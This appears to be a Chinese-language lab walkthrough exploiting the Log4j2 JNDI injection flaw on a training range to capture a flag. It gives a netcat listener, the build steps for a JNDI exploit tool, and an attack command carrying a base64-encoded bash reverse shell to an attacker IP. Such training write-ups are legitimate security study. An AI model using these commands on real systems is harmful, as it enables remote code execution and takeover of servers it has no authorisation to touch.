由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

登录靶场


选择我们的镜像系统,点击启动。

在kali中监听7777端口

nc -lvvp 7777

下载漏洞利用框架

git clone https://github.com/welk1n/JNDI-Injection-Exploit

安装maven

apt-get install maven

maven可以将java项目打包为jar文件。

cd JNDI-Injection-Exploit
mvn clean package -DskipTests#编译项目

打包完成后,会在/target/目录生成JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件。

攻击命令如下

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"  -A  192.168.137.137

参数说明:
这个安装在kali上面的jndi服务器是利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来启动起来的,启动参数包括-C是执行的bash命令,-c参数后面是执行的具体命令,用双引号引起来 -A 指服务器的IP。
需要注意的是,我们要对shell进行base64编码。(靶场在公网,本地的kali需要内网映射哦!)


如下,我们成功得到了flag


提交后,可解锁所有关卡。

Kali黑客笔记一键关注
Last modification:September 29, 2022
正在沿街乞讨中……